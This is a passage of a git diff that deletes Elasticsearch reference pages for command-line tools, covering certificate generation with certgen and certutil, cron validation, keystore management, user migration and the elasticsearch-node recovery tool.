default, the command runs in interactive mode and you are prompted for -information about each instance. An instance is any piece of the Elastic Stack -that requires a Transport Layer Security (TLS) or SSL certificate. 
Depending on -your configuration, {es}, Logstash, {kib}, and Beats might all require a -certificate and private key. - -The minimum required value for each instance is a name. This can simply be the -hostname, which is used as the Common Name of the certificate. You can also use -a full distinguished name. IP addresses and DNS names are optional. Multiple -values can be specified as a comma separated string. If no IP addresses or DNS -names are provided, you might disable hostname verification in your TLS or SSL -configuration. - -Depending on the parameters that you specify, you are also prompted for -necessary information such as the path for the output file and the CA private -key password. - -The `elasticsearch-certgen` command also supports a silent mode of operation to -enable easier batch operations. For more information, see <>. - -The output file is a zip file that contains the signed certificates and private -keys for each instance. If you chose to generate a CA, which is the default -behavior, the certificate and private key are included in the output file. If -you chose to generate CSRs, you should provide them to your commercial or -organization-specific certificate authority to obtain signed certificates. The -signed certificates must be in PEM format to work with the {stack} -{security-features}. - -[discrete] -[[certgen-parameters]] -=== Parameters - -`--cert `:: Specifies to generate new instance certificates and keys -using an existing CA certificate, which is provided in the `` argument. -This parameter cannot be used with the `-csr` parameter. - -`--csr`:: Specifies to operate in certificate signing request mode. - -`--days `:: -Specifies an integer value that represents the number of days the generated keys -are valid. The default value is `1095`. This parameter cannot be used with the -`-csr` parameter. - -`--dn `:: -Defines the _Distinguished Name_ that is used for the generated CA certificate. -The default value is `CN=Elastic Certificate Tool Autogenerated CA`. -This parameter cannot be used with the `-csr` parameter. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`--in `:: Specifies the file that is used to run in silent mode. The -input file must be a YAML file, as described in <>. - -`--key `:: Specifies the _private-key_ file for the CA certificate. -This parameter is required whenever the `-cert` parameter is used. - -`--keysize `:: -Defines the number of bits that are used in generated RSA keys. The default -value is `2048`. - -`--out `:: Specifies a path for the output file. - -`--pass `:: Specifies the password for the CA private key. -If the `-key` parameter is provided, then this is the password for the existing -private key file. Otherwise, it is the password that should be applied to the -generated CA key. This parameter cannot be used with the `-csr` parameter. - -`--p12 `:: -Generate a PKCS#12 (`.p12` or `.pfx`) container file for each of the instance -certificates and keys. The generated file is protected by the supplied password, -which can be blank. This parameter cannot be used with the `-csr` parameter. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -[discrete] -[[certgen-silent]] -==== Using `elasticsearch-certgen` in Silent Mode - -To use the silent mode of operation, you must create a YAML file that contains -information about the instances. 
It must match the following format: - -[source, yaml] --------------------------------------------------- -instances: - - name: "node1" <1> - ip: <2> - - "192.0.2.1" - dns: <3> - - "node1.mydomain.com" - - name: "node2" - ip: - - "192.0.2.2" - - "198.51.100.1" - - name: "node3" - - name: "node4" - dns: - - "node4.mydomain.com" - - "node4.internal" - - name: "CN=node5,OU=IT,DC=mydomain,DC=com" - filename: "node5" <4> --------------------------------------------------- -<1> The name of the instance. This can be a simple string value or can be a -Distinguished Name (DN). This is the only required field. -<2> An optional array of strings that represent IP Addresses for this instance. -Both IPv4 and IPv6 values are allowed. The values are added as Subject -Alternative Names. -<3> An optional array of strings that represent DNS names for this instance. -The values are added as Subject Alternative Names. -<4> The filename to use for this instance. This name is used as the name of the -directory that contains the instance's files in the output. It is also used in -the names of the files within the directory. This filename should not have an -extension. Note: If the `name` provided for the instance does not represent a -valid filename, then the `filename` field must be present. - -When your YAML file is ready, you can use the `elasticsearch-certgen` command to -generate certificates or certificate signing requests. Simply use the `-in` -parameter to specify the location of the file. For example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certgen -in instances.yml --------------------------------------------------- - -This command generates a CA certificate and private key as well as certificates -and private keys for the instances that are listed in the YAML file. diff --git a/docs/reference/commands/certutil.asciidoc b/docs/reference/commands/certutil.asciidoc deleted file mode 100644 index f8735614433..00000000000 --- a/docs/reference/commands/certutil.asciidoc +++ /dev/null @@ -1,313 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[certutil]] -== elasticsearch-certutil - -The `elasticsearch-certutil` command simplifies the creation of certificates for -use with Transport Layer Security (TLS) in the {stack}. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-certutil -( -(ca [--ca-dn ] [--days ] [--pem]) - -| (cert ([--ca ] | [--ca-cert --ca-key ]) -[--ca-dn ] [--ca-pass ] [--days ] -[--dns ] [--in ] [--ip ] -[--keep-ca-key] [--multiple] [--name ] [--pem]) - -| (csr [--dns ] [--in ] [--ip ] -[--name ]) - -[-E ] [--keysize ] [--out ] -[--pass ] -) - -| http - -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -You can specify one of the following modes: `ca`, `cert`, `csr`, `http`. The -`elasticsearch-certutil` command also supports a silent mode of operation to -enable easier batch operations. - -[discrete] -[[certutil-ca]] -==== CA mode - -The `ca` mode generates a new certificate authority (CA). By default, it -produces a single PKCS#12 output file, which holds the CA certificate and the -private key for the CA. If you specify the `--pem` parameter, the command -generates a zip file, which contains the certificate and private key in PEM -format. - -You can subsequently use these files as input for the `cert` mode of the command. 
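-
-As a minimal sketch of that flow, you could generate a PEM-formatted CA and
-then point the `cert` mode at the extracted certificate and key. The archive
-and extracted file names below (`my-ca.zip`, `ca/ca.crt`, `ca/ca.key`) are
-illustrative, not defaults:
-
-[source, sh]
---------------------------------------------------
-# Generate a CA certificate and private key in PEM format.
-bin/elasticsearch-certutil ca --pem --out my-ca.zip
-
-# After unzipping my-ca.zip, sign instance certificates with that CA.
-bin/elasticsearch-certutil cert --ca-cert ca/ca.crt --ca-key ca/ca.key
---------------------------------------------------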
- -[discrete] -[[certutil-cert]] -==== CERT mode - -The `cert` mode generates X.509 certificates and private keys. By default, it -produces a single certificate and key for use on a single instance. - -To generate certificates and keys for multiple instances, specify the -`--multiple` parameter, which prompts you for details about each instance. -Alternatively, you can use the `--in` parameter to specify a YAML file that -contains details about the instances. - -An instance is any piece of the Elastic Stack that requires a TLS or SSL -certificate. Depending on your configuration, {es}, Logstash, {kib}, and Beats -might all require a certificate and private key. The minimum required -information for an instance is its name, which is used as the common name for -the certificate. The instance name can be a hostname value or a full -distinguished name. If the instance name would result in an invalid file or -directory name, you must also specify a file name in the `--name` command -parameter or in the `filename` field in an input YAML file. - -You can optionally provide IP addresses or DNS names for each instance. If -neither IP addresses nor DNS names are specified, the Elastic stack products -cannot perform hostname verification and you might need to configure the -`verification_mode` security setting to `certificate` only. For more information -about this setting, see <>. - -All certificates that are generated by this command are signed by a CA. You can -provide your own CA with the `--ca` or `--ca-cert` parameters. Otherwise, the -command automatically generates a new CA for you. For more information about -generating a CA, see the <>. - -By default, the `cert` mode produces a single PKCS#12 output file which holds -the instance certificate, the instance private key, and the CA certificate. If -you specify the `--pem` parameter, the command generates PEM formatted -certificates and keys and packages them into a zip file. -If you specify the `--keep-ca-key`, `--multiple` or `--in` parameters, -the command produces a zip file containing the generated certificates and keys. - -[discrete] -[[certutil-csr]] -==== CSR mode - -The `csr` mode generates certificate signing requests (CSRs) that you can send -to a trusted certificate authority to obtain signed certificates. The signed -certificates must be in PEM or PKCS#12 format to work with {es} -{security-features}. - -By default, the command produces a single CSR for a single instance. - -To generate CSRs for multiple instances, specify the `--multiple` parameter, -which prompts you for details about each instance. Alternatively, you can use -the `--in` parameter to specify a YAML file that contains details about the -instances. - -The `csr` mode produces a single zip file which contains the CSRs and the -private keys for each instance. Each CSR is provided as a standard PEM -encoding of a PKCS#10 CSR. Each key is provided as a PEM encoding of an RSA -private key. - -[discrete] -[[certutil-http]] -==== HTTP mode - -The `http` mode guides you through the process of generating certificates for -use on the HTTP (REST) interface for {es}. It asks you a number of questions in -order to generate the right set of files for your needs. For example, depending -on your choices, it might generate a zip file that contains a certificate -authority (CA), a certificate signing request (CSR), or certificates and keys -for use in {es} and {kib}. Each folder in the zip file contains a readme that -explains how to use the files. 
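-
-For example, to start that interactive workflow, run the tool in `http` mode
-and follow the prompts:
-
-[source, sh]
---------------------------------------------------
-bin/elasticsearch-certutil http
---------------------------------------------------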
- -[discrete] -[[certutil-parameters]] -=== Parameters - -`ca`:: Specifies to generate a new local certificate authority (CA). This -parameter cannot be used with the `csr` or `cert` parameters. - -`cert`:: Specifies to generate new X.509 certificates and keys. -This parameter cannot be used with the `csr` or `ca` parameters. - -`csr`:: Specifies to generate certificate signing requests. This parameter -cannot be used with the `ca` or `cert` parameters. - -`http`:: Generates a new certificate or certificate request for the {es} HTTP -interface. - -`--ca `:: Specifies the path to an existing CA key pair -(in PKCS#12 format). This parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-cert `:: Specifies the path to an existing CA certificate (in -PEM format). You must also specify the `--ca-key` parameter. The `--ca-cert` -parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-dn `:: Defines the _Distinguished Name_ (DN) that is used for the -generated CA certificate. The default value is -`CN=Elastic Certificate Tool Autogenerated CA`. This parameter cannot be used -with the `csr` parameter. - -`--ca-key `:: Specifies the path to an existing CA private key (in -PEM format). You must also specify the `--ca-cert` parameter. The `--ca-key` -parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-pass `:: Specifies the password for an existing CA private key -or the generated CA private key. This parameter cannot be used with the `ca` or -`csr` parameters. - -`--days `:: Specifies an integer value that represents the number of days the -generated certificates are valid. The default value is `1095`. This parameter -cannot be used with the `csr` parameter. - -`--dns `:: Specifies a comma-separated list of DNS names. This -parameter cannot be used with the `ca` parameter. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`--in `:: Specifies the file that is used to run in silent mode. The -input file must be a YAML file. This parameter cannot be used with the `ca` -parameter. - -`--ip `:: Specifies a comma-separated list of IP addresses. This -parameter cannot be used with the `ca` parameter. - -`--keep-ca-key`:: When running in `cert` mode with an automatically-generated -CA, specifies to retain the CA private key for future use. - -`--keysize `:: -Defines the number of bits that are used in generated RSA keys. The default -value is `2048`. - -`--multiple`:: -Specifies to generate files for multiple instances. This parameter cannot be -used with the `ca` parameter. - -`--name `:: -Specifies the name of the generated certificate. This parameter cannot be used -with the `ca` parameter. - -`--out `:: Specifies a path for the output files. - -`--pass `:: Specifies the password for the generated private keys. -+ -Keys stored in PKCS#12 format are always password protected, however, -this password may be _blank_. If you want to specify a blank password -without a prompt, use `--pass ""` (with no `=`) on the command line. -+ -Keys stored in PEM format are password protected only if the -`--pass` parameter is specified. If you do not supply an argument for the -`--pass` parameter, you are prompted for a password. -Encrypted PEM files do not support blank passwords (if you do not -wish to password-protect your PEM keys, then do not specify -`--pass`). - - -`--pem`:: Generates certificates and keys in PEM format instead of PKCS#12. This -parameter cannot be used with the `csr` parameter. 
-
-`-s, --silent`:: Shows minimal output.
-
-`-v, --verbose`:: Shows verbose output.
-
-[discrete]
-=== Examples
-
-The following command generates a CA certificate and private key in PKCS#12
-format:
-
-[source, sh]
---------------------------------------------------
-bin/elasticsearch-certutil ca
---------------------------------------------------
-
-You are prompted for an output filename and a password. Alternatively, you can
-specify the `--out` and `--pass` parameters.
-
-You can then generate X.509 certificates and private keys by using the new
-CA. For example:
-
-[source, sh]
---------------------------------------------------
-bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12
---------------------------------------------------
-
-You are prompted for the CA password and for an output filename and password.
-Alternatively, you can specify the `--ca-pass`, `--out`, and `--pass` parameters.
-
-By default, this command generates a file called `elastic-certificates.p12`,
-which you can copy to the relevant configuration directory for each Elastic
-product that you want to configure. For more information, see
-<>.
-
-[discrete]
-[[certutil-silent]]
-==== Using `elasticsearch-certutil` in Silent Mode
-
-To use the silent mode of operation, you must create a YAML file that contains
-information about the instances. It must match the following format:
-
-[source, yaml]
---------------------------------------------------
-instances:
-  - name: "node1" <1>
-    ip: <2>
-      - "192.0.2.1"
-    dns: <3>
-      - "node1.mydomain.com"
-  - name: "node2"
-    ip:
-      - "192.0.2.2"
-      - "198.51.100.1"
-  - name: "node3"
-  - name: "node4"
-    dns:
-      - "node4.mydomain.com"
-      - "node4.internal"
-  - name: "CN=node5,OU=IT,DC=mydomain,DC=com"
-    filename: "node5" <4>
---------------------------------------------------
-<1> The name of the instance. This can be a simple string value or can be a
-Distinguished Name (DN). This is the only required field.
-<2> An optional array of strings that represent IP Addresses for this instance.
-Both IPv4 and IPv6 values are allowed. The values are added as Subject
-Alternative Names.
-<3> An optional array of strings that represent DNS names for this instance.
-The values are added as Subject Alternative Names.
-<4> The filename to use for this instance. This name is used as the name of the
-directory that contains the instance's files in the output. It is also used in
-the names of the files within the directory. This filename should not have an
-extension. Note: If the `name` provided for the instance does not represent a
-valid filename, then the `filename` field must be present.
-
-When your YAML file is ready, you can use the `elasticsearch-certutil` command
-to generate certificates or certificate signing requests. Simply use the `--in`
-parameter to specify the location of the file. For example:
-
-[source, sh]
---------------------------------------------------
-bin/elasticsearch-certutil cert --silent --in instances.yml --out test1.zip --pass testpassword --keep-ca-key
---------------------------------------------------
-
-This command generates a compressed `test1.zip` file. After you decompress the
-output file, there is a directory for each instance that was listed in the
-`instances.yml` file. Each instance directory contains a single PKCS#12 (`.p12`)
-file, which contains the instance certificate, instance private key, and CA
-certificate.
-
-You can also use the YAML file to generate certificate signing requests.
For -example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certutil csr --silent --in instances.yml --out test2.zip --pass testpassword --------------------------------------------------- - -This command generates a compressed file, which contains a directory for each -instance. Each instance directory contains a certificate signing request -(`*.csr` file) and private key (`*.key` file). diff --git a/docs/reference/commands/croneval.asciidoc b/docs/reference/commands/croneval.asciidoc deleted file mode 100644 index f066444e3bb..00000000000 --- a/docs/reference/commands/croneval.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[elasticsearch-croneval]] -== elasticsearch-croneval - -Validates and evaluates a <>. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-croneval -[-c, --count ] [-h, --help] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -This command enables you to verify that your -cron expressions are valid for use with -{es} and produce the expected results. - -This command is provided in the `$ES_HOME/bin` directory. - -[discrete] -[[elasticsearch-croneval-parameters]] -=== Parameters - -`-c, --count` :: - The number of future times this expression will be triggered. The default - value is `10`. - -`-d, --detail`:: - Shows detail for invalid cron expression. It will print the stacktrace if the - expression is not valid. - -`-h, --help`:: - Returns all of the command parameters. - -`-s, --silent`:: - Shows minimal output. - -`-v, --verbose`:: - Shows verbose output. - -[discrete] -=== Example - -If the cron expression is valid, the following command displays the next -20 times that the schedule will be triggered: - -[source,bash] --------------------------------------------------- -bin/elasticsearch-croneval "0 0/1 * * * ?" -c 20 --------------------------------------------------- diff --git a/docs/reference/commands/index.asciidoc b/docs/reference/commands/index.asciidoc deleted file mode 100644 index 70cc6261e74..00000000000 --- a/docs/reference/commands/index.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[commands]] -= Command line tools - -[partintro] --- - -{es} provides the following tools for configuring security and performing other -tasks from the command line: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::certgen.asciidoc[] -include::certutil.asciidoc[] -include::croneval.asciidoc[] -include::keystore.asciidoc[] -include::migrate-tool.asciidoc[] -include::node-tool.asciidoc[] -include::saml-metadata.asciidoc[] -include::setup-passwords.asciidoc[] -include::shard-tool.asciidoc[] -include::syskeygen.asciidoc[] -include::users-command.asciidoc[] diff --git a/docs/reference/commands/keystore.asciidoc b/docs/reference/commands/keystore.asciidoc deleted file mode 100644 index b3d178a99b3..00000000000 --- a/docs/reference/commands/keystore.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -[[elasticsearch-keystore]] -== elasticsearch-keystore - -The `elasticsearch-keystore` command manages <> -in the {es} keystore. 
- -[discrete] -[[elasticsearch-keystore-synopsis]] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-keystore -([add ] [-f] [--stdin] | -[add-file ( )+] | [create] [-p] | -[list] | [passwd] | [remove ] | [upgrade]) -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -[[elasticsearch-keystore-description]] -=== Description - -IMPORTANT: This command should be run as the user that will run {es}. - -Currently, all secure settings are node-specific settings that must have the -same value on every node. Therefore you must run this command on every node. - -When the keystore is password-protected, you must supply the password each time -{es} starts. - -Modifications to the keystore do not take effect until you restart {es}. - -Only some settings are designed to be read from the keystore. However, there -is no validation to block unsupported settings from the keystore and they can -cause {es} to fail to start. To see whether a setting is supported in the -keystore, see the setting reference. - -[discrete] -[[elasticsearch-keystore-parameters]] -=== Parameters - -`add `:: Adds settings to the keystore. Multiple setting names can be -specified as arguments to the `add` command. By default, you are prompted for -the values of the settings. If the keystore is password protected, you are also -prompted to enter the password. If a setting already exists in the keystore, you -must confirm that you want to overwrite the current value. If the keystore does -not exist, you must confirm that you want to create a keystore. To avoid these -two confirmation prompts, use the `-f` parameter. - -`add-file ( )+`:: Adds files to the keystore. - -`create`:: Creates the keystore. - -`-f, --force`:: When used with the `add` parameter, the command no longer prompts you -before overwriting existing entries in the keystore. Also, if you haven't -created a keystore yet, it creates a keystore that is obfuscated but not -password protected. - -`-h, --help`:: Returns all of the command parameters. - -`list`:: Lists the settings in the keystore. If the keystore is password -protected, you are prompted to enter the password. - -`-p`:: When used with the `create` parameter, the command prompts you to enter a -keystore password. If you don't specify the `-p` flag or if you enter an empty -password, the keystore is obfuscated but not password protected. - -`passwd`:: Changes or sets the keystore password. If the keystore is password -protected, you are prompted to enter the current password and the new one. You -can optionally use an empty string to remove the password. If the keystore is -not password protected, you can use this command to set a password. - -`remove `:: Removes settings from the keystore. Multiple setting -names can be specified as arguments to the `remove` command. - -`-s, --silent`:: Shows minimal output. - -`-x, --stdin`:: When used with the `add` parameter, you can pass the settings values -through standard input (stdin). Separate multiple values with carriage returns -or newlines. See <>. - -`upgrade`:: Upgrades the internal format of the keystore. - -`-v, --verbose`:: Shows verbose output. 
- -[discrete] -[[elasticsearch-keystore-examples]] -=== Examples - -[discrete] -[[creating-keystore]] -==== Create the keystore - -To create the `elasticsearch.keystore`, use the `create` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore create -p ----------------------------------------------------------------- - -You are prompted to enter the keystore password. A password-protected -`elasticsearch.keystore` file is created alongside the `elasticsearch.yml` file. - -[discrete] -[[changing-keystore-password]] -==== Change the password of the keystore - -To change the password of the `elasticsearch.keystore`, use the `passwd` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore passwd ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -current password and then enter the new one. If it is not password protected, -you are prompted to set a password. - -[discrete] -[[list-settings]] -==== List settings in the keystore - -To list the settings in the keystore, use the `list` command. - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore list ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[add-string-to-keystore]] -==== Add settings to the keystore - -Sensitive string settings, like authentication credentials for Cloud plugins, -can be added with the `add` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add the.setting.name.to.set ----------------------------------------------------------------- - -You are prompted to enter the value of the setting. If the {es} keystore is -password protected, you are also prompted to enter the password. - -You can also add multiple settings with the `add` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add \ - the.setting.name.to.set \ - the.other.setting.name.to.set ----------------------------------------------------------------- - -You are prompted to enter the values of the settings. If the {es} keystore is -password protected, you are also prompted to enter the password. - -To pass the settings values through standard input (stdin), use the `--stdin` -flag: - -[source,sh] ----------------------------------------------------------------- -cat /file/containing/setting/value | bin/elasticsearch-keystore add --stdin the.setting.name.to.set ----------------------------------------------------------------- - -Values for multiple settings must be separated by carriage returns or newlines. - -[discrete] -[[add-file-to-keystore]] -==== Add files to the keystore - -You can add sensitive files, like authentication key files for Cloud plugins, -using the `add-file` command. Settings and file paths are specified in pairs -consisting of `setting path`. 
- -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add-file the.setting.name.to.set /path/example-file.json ----------------------------------------------------------------- - -You can add multiple files with the `add-file` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add-file \ - the.setting.name.to.set /path/example-file.json \ - the.other.setting.name.to.set /path/other-example-file.json ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[remove-settings]] -==== Remove settings from the keystore - -To remove a setting from the keystore, use the `remove` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore remove the.setting.name.to.remove ----------------------------------------------------------------- - -You can also remove multiple settings with the `remove` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore remove \ - the.setting.name.to.remove \ - the.other.setting.name.to.remove ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[keystore-upgrade]] -==== Upgrade the keystore - -Occasionally, the internal format of the keystore changes. When {es} is -installed from a package manager, an upgrade of the on-disk keystore to the new -format is done during package upgrade. In other cases, {es} performs the upgrade -during node startup. This requires that {es} has write permissions to the -directory that contains the keystore. Alternatively, you can manually perform -such an upgrade by using the `upgrade` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore upgrade ----------------------------------------------------------------- diff --git a/docs/reference/commands/migrate-tool.asciidoc b/docs/reference/commands/migrate-tool.asciidoc deleted file mode 100644 index f4e4d5d403c..00000000000 --- a/docs/reference/commands/migrate-tool.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[migrate-tool]] -== elasticsearch-migrate - -deprecated:[7.2.0, "This tool is deprecated. Use the native realm directly."] - -The `elasticsearch-migrate` command migrates existing file-based users and roles -to the native realm. From 5.0 onward, you should use the `native` realm to -manage roles and local users. - - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-migrate -(native (-U, --url ) -[-h, --help] [-E ] -[-n, --users ] [-r, --roles ] -[-u, --username ] [-p, --password ] -[-s, --silent] [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -NOTE: When migrating from Shield 2.x, the `elasticsearch-migrate` tool should be -run prior to upgrading to ensure all roles can be migrated as some may be in a -deprecated format that {xpack} cannot read. The `migrate` tool is available in -Shield 2.4.0 and higher. - -The `elasticsearch-migrate` tool loads the existing file-based users and roles -and calls the user and roles APIs to add them to the native realm. 
You can -migrate all users and roles, or specify the ones you want to migrate. Users and -roles that already exist in the `native` realm are not replaced or -overridden. If the names you specify with the `--users` and `--roles` options -don't exist in the `file` realm, they are skipped. - -[discrete] -[[migrate-tool-options]] -=== Parameters -The `native` subcommand supports the following options: - -`-E `:: -Configures a setting. - -`-h, --help`:: -Returns all of the command parameters. - -`-n`, `--users`:: -Comma-separated list of the users that you want to migrate. If this parameter is -not specified, all users are migrated. - -`-p`, `--password`:: -Password to use for authentication with {es}. -//TBD: What is the default if this isn't specified? - -`-r`, `--roles`:: -Comma-separated list of the roles that you want to migrate. If this parameter is -not specified, all roles are migrated. - -`-s, --silent`:: Shows minimal output. - -`-U`, `--url`:: -Endpoint URL of the {es} cluster to which you want to migrate the -file-based users and roles. This parameter is required. - -`-u`, `--username`:: -Username to use for authentication with {es}. -//TBD: What is the default if this isn't specified? - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -Run the `elasticsearch-migrate` tool when {xpack} is installed. For example: - -[source, sh] ----------------------------------------------------------------------- -$ bin/elasticsearch-migrate native -U http://localhost:9200 -u elastic --p x-pack-test-password -n lee,foo -r role1,role2,role3,role4,foo -starting migration of users and roles... -importing users from [/home/es/config/shield/users]... -found existing users: [test_user, joe3, joe2] -migrating user [lee] -{"user":{"created":true}} -no user [foo] found, skipping -importing roles from [/home/es/config/shield/roles.yml]... -found existing roles: [marvel_user, role_query_fields, admin_role, role3, admin, -remote_marvel_agent, power_user, role_new_format_name_array, role_run_as, -logstash, role_fields, role_run_as1, role_new_format, kibana4_server, user, -transport_client, role1.ab, role_query] -migrating role [role1] -{"role":{"created":true}} -migrating role [role2] -{"role":{"created":true}} -role [role3] already exists, skipping -no role [foo] found, skipping -users and roles imported. ----------------------------------------------------------------------- - -Additionally, the `-E` flag can be used to specify additional settings. For example -to specify a different configuration directory, the command would look like: - -[source, sh] ----------------------------------------------------------------------- -$ bin/elasticsearch-migrate native -U http://localhost:9200 -u elastic --p x-pack-test-password -E path.conf=/etc/elasticsearch ----------------------------------------------------------------------- diff --git a/docs/reference/commands/node-tool.asciidoc b/docs/reference/commands/node-tool.asciidoc deleted file mode 100644 index 78bae263986..00000000000 --- a/docs/reference/commands/node-tool.asciidoc +++ /dev/null @@ -1,592 +0,0 @@ -[[node-tool]] -== elasticsearch-node - -The `elasticsearch-node` command enables you to perform certain unsafe -operations on a node that are only possible while it is shut down. This command -allows you to adjust the <> of a node, unsafely edit cluster -settings and may be able to recover some data after a disaster or start a node -even if it is incompatible with the data on disk. 
- -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-node repurpose|unsafe-bootstrap|detach-cluster|override-version - [--ordinal ] [-E ] - [-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -This tool has a number of modes: - -* `elasticsearch-node repurpose` can be used to delete unwanted data from a - node if it used to be a <> or a - <> but has been repurposed not to have one - or other of these roles. - -* `elasticsearch-node remove-settings` can be used to remove persistent settings - from the cluster state in case where it contains incompatible settings that - prevent the cluster from forming. - -* `elasticsearch-node remove-customs` can be used to remove custom metadata - from the cluster state in case where it contains broken metadata that - prevents the cluster state from being loaded. - -* `elasticsearch-node unsafe-bootstrap` can be used to perform _unsafe cluster - bootstrapping_. It forces one of the nodes to form a brand-new cluster on - its own, using its local copy of the cluster metadata. - -* `elasticsearch-node detach-cluster` enables you to move nodes from one - cluster to another. This can be used to move nodes into a new cluster - created with the `elasticsearch-node unsafe-bootstrap` command. If unsafe - cluster bootstrapping was not possible, it also enables you to move nodes - into a brand-new cluster. - -* `elasticsearch-node override-version` enables you to start up a node - even if the data in the data path was written by an incompatible version of - {es}. This may sometimes allow you to downgrade to an earlier version of - {es}. - -[[node-tool-repurpose]] -[discrete] -==== Changing the role of a node - -There may be situations where you want to repurpose a node without following -the <>. The `elasticsearch-node -repurpose` tool allows you to delete any excess on-disk data and start a node -after repurposing it. - -The intended use is: - -* Stop the node -* Update `elasticsearch.yml` by setting `node.roles` as desired. -* Run `elasticsearch-node repurpose` on the node -* Start the node - -If you run `elasticsearch-node repurpose` on a node without the `data` role and -with the `master` role then it will delete any remaining shard data on that -node, but it will leave the index and cluster metadata alone. If you run -`elasticsearch-node repurpose` on a node without the `data` and `master` roles -then it will delete any remaining shard data and index metadata, but it will -leave the cluster metadata alone. - -[WARNING] -Running this command can lead to data loss for the indices mentioned if the -data contained is not available on other nodes in the cluster. Only run this -tool if you understand and accept the possible consequences, and only after -determining that the node cannot be repurposed cleanly. - -The tool provides a summary of the data to be deleted and asks for confirmation -before making any changes. You can get detailed information about the affected -indices and shards by passing the verbose (`-v`) option. - -[discrete] -==== Removing persistent cluster settings - -There may be situations where a node contains persistent cluster -settings that prevent the cluster from forming. Since the cluster cannot form, -it is not possible to remove these settings using the -<> API. - -The `elasticsearch-node remove-settings` tool allows you to forcefully remove -those persistent settings from the on-disk cluster state. 
The tool takes a -list of settings as parameters that should be removed, and also supports -wildcard patterns. - -The intended use is: - -* Stop the node -* Run `elasticsearch-node remove-settings name-of-setting-to-remove` on the node -* Repeat for all other master-eligible nodes -* Start the nodes - -[discrete] -==== Removing custom metadata from the cluster state - -There may be situations where a node contains custom metadata, typically -provided by plugins, that prevent the node from starting up and loading -the cluster from disk. - -The `elasticsearch-node remove-customs` tool allows you to forcefully remove -the problematic custom metadata. The tool takes a list of custom metadata names -as parameters that should be removed, and also supports wildcard patterns. - -The intended use is: - -* Stop the node -* Run `elasticsearch-node remove-customs name-of-custom-to-remove` on the node -* Repeat for all other master-eligible nodes -* Start the nodes - -[discrete] -==== Recovering data after a disaster - -Sometimes {es} nodes are temporarily stopped, perhaps because of the need to -perform some maintenance activity or perhaps because of a hardware failure. -After you resolve the temporary condition and restart the node, -it will rejoin the cluster and continue normally. Depending on your -configuration, your cluster may be able to remain completely available even -while one or more of its nodes are stopped. - -Sometimes it might not be possible to restart a node after it has stopped. For -example, the node's host may suffer from a hardware problem that cannot be -repaired. If the cluster is still available then you can start up a fresh node -on another host and {es} will bring this node into the cluster in place of the -failed node. - -Each node stores its data in the data directories defined by the -<>. This means that in a disaster you can -also restart a node by moving its data directories to another host, presuming -that those data directories can be recovered from the faulty host. - -{es} <> in order to elect a master and to update the cluster -state. This means that if you have three master-eligible nodes then the cluster -will remain available even if one of them has failed. However if two of the -three master-eligible nodes fail then the cluster will be unavailable until at -least one of them is restarted. - -In very rare circumstances it may not be possible to restart enough nodes to -restore the cluster's availability. If such a disaster occurs, you should -build a new cluster from a recent snapshot and re-import any data that was -ingested since that snapshot was taken. - -However, if the disaster is serious enough then it may not be possible to -recover from a recent snapshot either. Unfortunately in this case there is no -way forward that does not risk data loss, but it may be possible to use the -`elasticsearch-node` tool to construct a new cluster that contains some of the -data from the failed cluster. - -[[node-tool-override-version]] -[discrete] -==== Bypassing version checks - -The data that {es} writes to disk is designed to be read by the current version -and a limited set of future versions. It cannot generally be read by older -versions, nor by versions that are more than one major version newer. The data -stored on disk includes the version of the node that wrote it, and {es} checks -that it is compatible with this version when starting up. 
